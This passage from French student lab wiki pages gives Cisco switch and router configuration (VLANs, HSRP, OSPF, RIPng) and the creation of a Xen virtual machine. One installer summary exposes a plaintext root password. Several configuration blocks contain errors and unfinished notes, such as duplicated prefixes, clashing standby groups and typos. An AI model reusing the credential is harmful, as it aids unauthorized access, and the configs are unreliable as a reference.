|}&lt;br /&gt;
&lt;br /&gt;
== Table IP VLANs ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align:center&amp;quot;&lt;br /&gt;
! Nom !! Vlan !! Réseau IPV4 (Routé) !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel !! IPv4 VLAN Wi-Fi (non routé)&lt;br /&gt;
|-&lt;br /&gt;
|Xen&lt;br /&gt;
|42&lt;br /&gt;
|193.48.57.160/28&lt;br /&gt;
|2001:660:4401:60B1::/64&lt;br /&gt;
|193.48.57.174&lt;br /&gt;
|193.48.57.173&lt;br /&gt;
|193.48.57.172&lt;br /&gt;
|      ****&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 1&lt;br /&gt;
|2&lt;br /&gt;
|      ****&lt;br /&gt;
|2001:660:4401:60B2::/64 &lt;br /&gt;
|10.60.1.254&lt;br /&gt;
|10.60.1.253&lt;br /&gt;
|10.60.1.252&lt;br /&gt;
|10.60.1.0/16&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 2&lt;br /&gt;
|3&lt;br /&gt;
|      ****&lt;br /&gt;
|2001:660:4401:60B3::/64 &lt;br /&gt;
|10.60.2.254&lt;br /&gt;
|10.60.2.253&lt;br /&gt;
|10.60.2.252&lt;br /&gt;
|10.60.2.0/16&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 3&lt;br /&gt;
|4&lt;br /&gt;
|      ****&lt;br /&gt;
|2001:660:4401:60B4::/64&lt;br /&gt;
|10.60.3.254&lt;br /&gt;
|10.60.3.253&lt;br /&gt;
|10.60.3.252&lt;br /&gt;
|10.60.3.0/16 &lt;br /&gt;
|-&lt;br /&gt;
|Groupe 4&lt;br /&gt;
|5&lt;br /&gt;
|      ****&lt;br /&gt;
|2001:660:4401:60B5::/64 &lt;br /&gt;
|10.60.4.254&lt;br /&gt;
|10.60.4.253&lt;br /&gt;
|10.60.4.252&lt;br /&gt;
|10.60.4.0/16&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 5&lt;br /&gt;
|6&lt;br /&gt;
|      ****&lt;br /&gt;
|2001:660:4401:60B6::/64 &lt;br /&gt;
|10.60.5.254&lt;br /&gt;
|10.60.5.253&lt;br /&gt;
|10.60.5.252&lt;br /&gt;
|10.60.5.0/16 &lt;br /&gt;
|-&lt;br /&gt;
|Groupe 6&lt;br /&gt;
|7&lt;br /&gt;
|      ****&lt;br /&gt;
|2001:660:4401:60B7::/64 &lt;br /&gt;
|10.60.6.254&lt;br /&gt;
|10.60.6.253&lt;br /&gt;
|10.60.6.252&lt;br /&gt;
|10.60.6.0/16 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Architecture matérielle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Archi_IMA2A5.jpg|500px|center|thumb|© Copyright Minou]]&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Groupe !! Nom de la VM !! IP de la VM&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 1&lt;br /&gt;
|ima2a5-zerofun&lt;br /&gt;
|193.48.57.161/28 &lt;br /&gt;
|-&lt;br /&gt;
|Groupe 2&lt;br /&gt;
|ima2a5-mol-ish&lt;br /&gt;
|193.48.57.162/28 &lt;br /&gt;
|-&lt;br /&gt;
|Groupe 3&lt;br /&gt;
|ima2a5-rex4ever&lt;br /&gt;
|193.48.57.163/28 &lt;br /&gt;
|-&lt;br /&gt;
|Groupe 4&lt;br /&gt;
|ima2a5-wateck&lt;br /&gt;
|193.48.57.164/28 &lt;br /&gt;
|-&lt;br /&gt;
|Groupe 5&lt;br /&gt;
|ima2a5-nofun&lt;br /&gt;
|193.48.57.165/28 &lt;br /&gt;
|-&lt;br /&gt;
|Groupe 6&lt;br /&gt;
|ima2a5-4fun&lt;br /&gt;
|193.48.57.166/28 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.6 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51110</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51110"/>
				<updated>2019-11-24T19:12:58Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Client Wifi - ordinateur Requin */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001.660.4401.60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
